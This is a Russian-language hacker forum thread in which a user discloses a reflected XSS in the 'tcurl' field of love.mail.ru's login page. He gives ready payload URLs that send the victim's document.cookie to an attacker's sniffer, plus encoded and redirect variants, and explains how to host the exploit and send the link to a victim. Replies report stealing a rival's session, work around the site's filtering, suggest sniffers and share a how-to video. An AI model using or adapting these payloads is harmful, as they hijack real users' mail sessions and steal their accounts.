|
XSS mail.ru rambler.ru
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)
Старый добрый дядя slider вам расскроет тайну :)Да.. да... прям возьмём и угоним сессию.. Короче ... дело было вечером .. делать было нечего.. и полез я искать уязвимости на этих почтовиках.. После многих часов поиска (уважайте чужой труд! ;) ) нашол таки... в файле http://love.mail.ru/my/login.phtml скрытую строку: Код HTML:
<input type="hidden" name="tcurl">паразитка такая не фильтруетсо =) вбил я в нее "><script>alert()</script> и вылез заветный алерт!.. А вот тут по сценарию вам надо дать exploit )) С переадрессацией и со всеми наворотами )) А вот он б*я =) майл.ru Код HTML:
<body onload="p.submit()">Код HTML:
<body onload="p.submit()">СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ? А вот причём... кука прийдёт и от лов и от майла! =) Так что статейка думаю многим пригодистя =) Ну что.. время пошло кто не успел тот опоздал... =) Торопитесь время акции ограничего =) С уважением slider Ахх да... как юзать )) Сохраняете этот "сплойт" в html и качаете на народ.ru далее даёте ссылку комунить на свой "скрипт"... )) Удачи!.. Вот вам ещё скриптеГ =) Код HTML:
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>Код HTML:
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E |
Засекаем время сколько бага проживет =)
|
Отпишитесь хоть.. КОМУ пригодилось! =)
|
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C
или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='htt p://forum.antichat.ru';</script><!--" <a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'ht tp://forum.antichat.ru\'</script><!--"'>ФОрум</a> я конечно не понял точно как сделал слайдер но вот как я сделел |
Мда только жаль что я ен умею этим пользоваться..
|
"Торопитесь время акции ограничего =)"
Мда |
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
И так можно использовать!!! =) но это как то банально! |
Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь. |
Цитата:
Жертва должна перейти по ссылке, либо быть перенаправленной на нее |
Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........ :confused: |
Походу плюсик начал фильтроваться ;)
Вернее + просто вырезается, а если пытаешься замаскировать, то отрезается все что идет после плюса. |
НАврал - простое урл шифрование плюса и все катит.
|
эх жаль в письме низя"ВНИМАНИЕ!
Данное письмо содержит потенциально опасный Html-код, заблокированный автоматической системой безопасности." а то ссылку давать не каждый пойдёт-то... |
Пробовал! Пашет! Пока бага актуальна!
|
Все,.. пашет! Спасибо Slider ! Наконец то я достал врага.
Сам ты чайник....я просто покурил вчера больше чем надо... |
а никто не подскажет какой нить альтернативный сниффер просто я никак не могу завести свой на античате
|
http://xss.netsec.ru
|
Респект...Sliderу
|
Гы гы... значит всё таки не зря старалсо! =)
|
Красавец!!!!!!!!!! Супер! Отлично
|
Spaсибо, все ок!!!
|
Все вроде делаю, как указано на первой странице. Чего то не прокатывает. Видимо делаю что-то не так. Ваш рабочий вариант на данный момент отличается от оного на первой странице?
|
вчера "+" фильтровать начали, но с concat все нормально пашет. советую ссылку обработать такой функией:
PHP код:
|
Ничё там не фильтруется!...
всё работает! |
пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))
|
А у меня куки на сниффер только от фаерфокса почемуто приходят...
|
"пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))"
Точно... |
Ну почему тогда у меня ничего не пашет. Выдает:
Ошибка: Неверно указан логин или пароль А наряду с полями для логина и пароля выдает (">) без скобок |
Цитата:
Код HTML:
"><script>alert(document.cookie);</script><br style="Код HTML:
"><script>alert(document.cookie+'dead-plus');</script><br style="откроем исходник и увидим: Код HTML:
name="tcurl" value=""><script>alert(document.cookie "dead-plus");</script>только что еще раз затестил |
ХЗ ..куки приходят!
|
"Ну почему тогда у меня ничего не пашет. Выдает:
Ошибка: Неверно указан логин или пароль А наряду с полями для логина и пароля выдает (">) без скобок" Куки все равно приходят... СДЕЛАЙте ВИДИО! |
ЖДИТЕ!.. =)
|
Цитата:
|
жива еще Xss?
|
ААА..видио..быстрей!!!
|
для самых нетерпеливых =)
вот моя версия видео) http://armed.h12.ru/xss.rar безусловно, все права принадлежат slider'y, поэтому по первому требованию файл уберу. сорри, наверное немного косячно) но у меня это первый такой мувик) ссылка не совсем прямая, если так можно сказать) при переходе появиться сообщение что файл находится на сервере бесплатного хостинга, там ссылку и нажмете...) |
Через чо у тебя это видео посмотреть-то можно??
|
нда..а нормальным чем-нибудь мог записать? или ты с учетом на то что нам кодеки дополнительные качать надо?) лол
|
ну сорри, на самом деле первый раз это делал, просто запусил ScreenVirtuoso Pro с настройками по дефолту... кодек FMVC/MSVC
DSH 4CC FMVC VFW Description FM Screen Capture Codec DSH DirectShow CLSID CLSID_AVIDec {CF49D4E0-1115-11CE-B03A-0020AF0BA770} REG Driver File F:\WINDOWS\system32\fmcodec.dll DSH Friendly Name FM Screen Capture Codec - - Function Decoder REG Merit 0x00200000 VFW Name FMCodec - - Type VFW |
а где его взять можно?
|
| Время: 17:17 |